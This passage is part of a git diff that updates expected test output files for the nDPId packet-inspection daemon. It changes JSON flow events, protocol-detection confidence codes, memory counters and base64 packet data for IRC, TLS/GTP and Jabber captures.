{"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"IRC","breed":"Unsafe","category":"Chat"}} +00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1387554241634,"flow_last_seen":1387554241695,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":114,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1387554241695,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"IRC","breed":"Unsafe","category":"Chat"}} +00909{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":29,"source":"irc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1387554241634,"flow_last_seen":1387554256201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7015,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1387554256201,"l3_proto":"ip4","src_ip":"10.180.156.249","dst_ip":"38.229.70.20","src_port":45921,"dst_port":8000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"IRC","breed":"Unsafe","category":"Chat"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":29,"source":"irc.pcap","alias":"nDPId-test","packets-captured":29,"packets-processed":29,"total-skipped-flows":0,"total-l4-payload-len":7015,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1387554256201} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 29/29 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5872347 bytes -~~ total memory freed........: 5872347 bytes -~~ total allocations/frees...: 118145/118145 +~~ total memory allocated....: 6006012 bytes +~~ total memory freed........: 6006012 bytes +~~ total allocations/frees...: 120907/120907 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 914 chars diff --git a/test/results/ja3_lots_of_cipher_suites.pcap.out b/test/results/ja3_lots_of_cipher_suites.pcap.out index 68a9a9789..6c1a9afdb 100644 --- a/test/results/ja3_lots_of_cipher_suites.pcap.out +++ b/test/results/ja3_lots_of_cipher_suites.pcap.out @@ -31,9 +31,9 @@ ~~ total active/idle flows...: 0/0 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5868383 bytes -~~ total memory freed........: 5868383 bytes -~~ total allocations/frees...: 118110/118110 +~~ total memory allocated....: 6002017 bytes +~~ total memory freed........: 6002017 bytes +~~ total allocations/frees...: 120872/120872 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 207 chars ~~ json string max len.......: 2328 chars diff --git a/test/results/ja3_lots_of_cipher_suites_2_anon.pcap.out b/test/results/ja3_lots_of_cipher_suites_2_anon.pcap.out index 15aca2cfc..c72f553b1 100644 --- a/test/results/ja3_lots_of_cipher_suites_2_anon.pcap.out +++ b/test/results/ja3_lots_of_cipher_suites_2_anon.pcap.out @@ -4,7 +4,7 @@ 00437{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":114,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABkI90AAEARjIOEvvQMl3m5LAhoCGgAUAAAMv8AQAE8W3RuUAAARQAAPGNKQABABin+wKiTsZd5waDkgAG7Qsba5QAAAACgAjkIo+MAAAIEBbQEAggKAAu5rwAAAAABAwMF"} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505724520744,"flow_last_seen":1505724520744,"flow_idle_time":200000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1505724520744,"l3_proto":"ip4","src_ip":"132.190.244.12","dst_ip":"151.121.185.44","src_port":2152,"dst_port":2152,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00556{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1505724520744,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":114,"pkt_l4_len":80,"thread_ts_msec":1505724520744,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABkI90AAEARjIOEvvQMl3m5LAhoCGgAUAAAMv8AQAE8W3RuUAAARQAAPGNKQABABin+wKiTsZd5waDkgAG7Qsba5QAAAACgAjkIo+MAAAIEBbQEAggKAAu5rwAAAAABAwMF"} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505724520744,"flow_last_seen":1505724520744,"flow_idle_time":200000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1505724520744,"l3_proto":"ip4","src_ip":"132.190.244.12","dst_ip":"151.121.185.44","src_port":2152,"dst_port":2152,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1505724520744,"flow_last_seen":1505724520744,"flow_idle_time":200000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1505724520744,"l3_proto":"ip4","src_ip":"132.190.244.12","dst_ip":"151.121.185.44","src_port":2152,"dst_port":2152,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}} 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1505724520947,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1505724520947,"pkt":"MNF+EIYg\/Ejv6KgaCABFAABgHZ4AAD0Rln6XebkshL70DAhoCGgATAAAMP8APEGxP1xFAAA8AABAADIGm0iXecGgwKiTsQG75IBV2gFiQsba5qAScSDmyQAAAgQFeAQCCAoxbvx\/AAu5rwEDAwc="} 00255{"error_event_id":15,"error_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":3,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":106,"expected":110,"global_ts_msec":1505724521281} 00441{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1505724520947,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABcNCoAAEARfD6EvvQMl3m5LAhoCGgASAAAMv8AOAE8W3RxUAAARQAANGNLQABABioFwKiTsZd5waDkgAG7Qsba5lXaAWOAEAHJhFMAAAEBCAoAC7oNMW78fw=="} @@ -31,7 +31,7 @@ 01923{"packet_event_id":1,"packet_event_name":"packet","packet_id":24,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1202,"pkt_l4_len":0,"thread_ts_msec":1505724526302,"pkt":"\/Ejvopo\/MNF+D2w+CABFuASk0zUAAEAR2OqEvvQMl3m5LAhoCGgEkAAAMv8EgAE8W3SEUAAARQAEfGNVQABABiWzwKiTsZd5waDkgAG7Qsbeu1XaCIaAGAIjjQIAAAEBCAoAC7viMW8PEhcDAwRDAAAAAAAAAAFJqZsr2XFOAWwXDu0+7Y9vPaXF6QBuCgzG25Q\/KbgqYu88jDq040h3tvc+aLu+DTcTspkgI5XvLXRFxqBxdvTufQDpaiPCYyECwSJhep14pGbJr74Zfc\/j6Av4+JPM7XoLFlKyk030dBFrQrGR3OC0pR3zpNnKaUQjB+tTd4nLUXzWv2mjrWj7pce\/bPzpfedXtz8tcxLvi8SEHscHZsArZDwdeUf5QLLvVFDZNU4ZEQaimEyX15KzM6G5ToQIrvIFXEhAF3dG5oXfA+Ae4WLPSnyb5NwMMF4kDDNIe1ZVjNBxSABFaYjPPiJg0gQg\/+QEqg1CX23cpDZyJxz7smWB9h7xs7H9AygfzY9wASIaEq6DqGATMfMsN3dYWATzH3hum27SvUyhZ75L0k5HqqsoGIfu+LYC1hNDONFV6+lkufq4BpitkoCYAzdbmomEw05OzNlTrWr0XPFYwgNz7thDeUGqO\/xKaUFeEC4Y7Xy1Gc41hkWo54xuUrmAxO9X1\/+gkn+c3MHGrRESux79pmus577Y7Fo4U\/4oJ6luI0bGV303za2qj4yCdXLeQWjtrOGdBBkw\/wBHF5IbYMOF9bJFx68HeOrrn4nYFgmVhrWXDxyY1xWgLDIjRY5UDtLoQjMcM03rPMf1Z8L76UZ2YHFgGbBPU1OGctMjFUx+R73JxaqxVRw4ymshyrqvP9+E3HE7UquBR2x9EQISSgDorx56T92cLWOMHjn+ek1JnoCiwSF6nQ5wDmyw72RptvWz6AU0FUnuqURBs\/Yt3PJfdurGsJxYBs+wDZGPNy41Qf5bJwUyIKMkYqmgYULqkbNWOZxFV99s4+BV262g1PDKETuLCv2a\/bmZ\/xolpL0HSIF0vX2xBElZHZ+hd84KVa1Y1XFdDw8mr7TyDNVUiL3tNunlmrQfdQETgjFhKIaQn6XGF8V1kH05Pfc52o2vbYUaSnIDJWt30SPlvtzw5ruQY4AYjS9\/zvW4ADabvEgwiTZjb2txs6oHyKnVCekE0WjVDCEceBK1aQn6rKOOPXvKdj3iDTl1Ep2O3m+u3pqEIGzMPxhnKMpUTUMR5vH5kQ6XVO3\/\/O3Fv4Gs+QXjMNEsaI4CKiHU5k1Q0MbXxbrvkqD7nzLmoRz\/kTcbg2\/gjB1KRUMXAi27pqag38iFL5LdNl02Bk8czI\/JMSOpzjzmaW1x5HQLihorbExEU6gi6LG\/RLyN0wdxLAEVfUuvGwMzSO969\/mxBBfNydqDsDV4YQiFLRSJTGt9vGEn+QmnSkfZdl3aM1n9v1oUbRwSanCl2G5YkrCo8NVoEuKsjRybURkxyp7cEy1T38EAeIr7HE3lwdlheQG63MqfDiIz7ld4f9Q0nYgQa1Und43tDU8iH72YEZe9PfwwG1sJOBUaECdibU9+goippYdBUnHF+Q41lhVnISz+74wOY0LMuM8="} 00256{"error_event_id":15,"error_event_name":"Captured packet size is smaller than expected packet size","datalink":1,"packet_id":25,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","size":106,"expected":110,"global_ts_msec":1505724526501} 00442{"packet_event_id":1,"packet_event_name":"packet","packet_id":25,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":106,"pkt_l4_len":0,"thread_ts_msec":1505724526501,"pkt":"\/Ejvopo\/MNF+D2w+CABFuABc0zYAAEAR3TGEvvQMl3m5LAhoCGgASAAAMv8AOAE8W3SFUAAARQAANGNWQABABin6wKiTsZd5waDkgAG7QsbjA1XaCIaAEQIjYE4AAAEBCAoAC7vkMW8PEg=="} -00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1505724520744,"flow_last_seen":1505724526702,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5832,"flow_avg_l4_payload_len":216,"midstream":0,"thread_ts_msec":1505724526702,"l3_proto":"ip4","src_ip":"132.190.244.12","dst_ip":"151.121.185.44","src_port":2152,"dst_port":2152,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}} +00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":27,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1505724520744,"flow_last_seen":1505724526702,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5832,"flow_avg_l4_payload_len":216,"midstream":0,"thread_ts_msec":1505724526702,"l3_proto":"ip4","src_ip":"132.190.244.12","dst_ip":"151.121.185.44","src_port":2152,"dst_port":2152,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"GTP.GTP_U","breed":"Acceptable","category":"Network"}} 00581{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":27,"source":"ja3_lots_of_cipher_suites_2_anon.pcap","alias":"nDPId-test","packets-captured":27,"packets-processed":27,"total-skipped-flows":0,"total-l4-payload-len":5832,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":35,"global_ts_msec":1505724526702} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 27/27 @@ -41,9 +41,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870226 bytes -~~ total memory freed........: 5870226 bytes -~~ total allocations/frees...: 118141/118141 +~~ total memory allocated....: 6003860 bytes +~~ total memory freed........: 6003860 bytes +~~ total allocations/frees...: 120903/120903 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 260 chars ~~ json string max len.......: 1928 chars diff --git a/test/results/jabber.pcap.out b/test/results/jabber.pcap.out index 04c8d00ff..a0e8a36c6 100644 --- a/test/results/jabber.pcap.out +++ b/test/results/jabber.pcap.out @@ -1,24 +1,98 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"jabber.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} -00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1504181789350} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1504181789350,"flow_last_seen":1504181789350,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1504181789350,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1504181789350,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1504181789350,"pkt":"AAwpvhIxAFBWwAAICABFAAA0dxlAAIAGjb\/AqDoBwKg6mdDUFGaBHPlXAAAAAIACIAD5dQAAAgQFtAEDAwgBAQQC"} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1504181789365,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1504181789365,"pkt":"AFBWwAAIAAwpvhIxCABFAAA0AABAAEAGRNnAqDqZwKg6ARRm0NRyyKsUgRz5WIASchCJeAAAAgQFtAEBBAIBAwMH"} -00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1504181789366,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1504181789366,"pkt":"AAwpvhIxAFBWwAAICABFAAAodxpAAIAGjcrAqDoBwKg6mdDUFGaBHPlYcsirFVAQAQA7WwAAAAAAAAAA"} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1504181789350,"flow_last_seen":1504181789367,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1504181789367,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} -00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":13,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1504181789350,"flow_last_seen":1504181789418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1504181789418,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} -00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":13,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":13,"packets-processed":13,"total-skipped-flows":0,"total-l4-payload-len":157,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1504181789418} +00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1502379693992} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502379723841,"flow_last_seen":1502379723841,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1502379723841,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57094,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1502379723841,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1502379723841,"pkt":"Tl6SKSKGaFs1pN2oCABFAABAZ6hAAEAGAACsEAA+rBABit8GFGbDqJX1AAAAALAC\/\/9aGwAAAgQFtAEDAwQBAQgKTgMEJwAAAAAEAgAA"} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1502379723842,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1502379723842,"pkt":"aFs1pN2oTl6SKSKGCABFAAA8AABAAEAG4NOsEAGKrBAAPhRm3wagxQKCw6iV9qASOJCmRgAAAgQFtAQCCAoAGMyaTgMEJwEDAwc="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1502379723842,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1502379723842,"pkt":"Tl6SKSKGaFs1pN2oCABFAAA0qcBAAEAGAACsEAA+rBABit8GFGbDqJX2oMUCg4AQICtaDwAAAQEICk4DBCcAGMya"} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1502379723841,"flow_last_seen":1502379723843,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1502379723843,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57094,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"jabber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502380175298,"flow_last_seen":1502380175298,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1502380175298,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57122,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"jabber.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1502380175298,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1502380175298,"pkt":"Tl6SKSKGaFs1pN2oCABFAABAIwFAAEAGAACsEAA+rBABit8iFGaEgGHPAAAAALAC\/\/9aGwAAAgQFtAEDAwQBAQgKTgnffgAAAAAEAgAA"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"jabber.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1502380175299,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1502380175299,"pkt":"aFs1pN2oTl6SKSKGCABFAAA8AABAAEAG4NOsEAGKrBAAPhRm3yLL7qcahIBh0KASOJCKxQAAAgQFtAQCCAoAH7AnTgnffgEDAwc="} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"jabber.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1502380175299,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1502380175299,"pkt":"Tl6SKSKGaFs1pN2oCABFAAA0ciBAAEAGAACsEAA+rBABit8iFGaEgGHQy+6nG4AQICtaDwAAAQEICk4J334AH7An"} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"jabber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1502380175298,"flow_last_seen":1502380175300,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1502380175300,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57122,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"jabber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1502380213387,"flow_last_seen":1502380213387,"flow_idle_time":7580000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":1,"thread_ts_msec":1502380213387,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57126,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 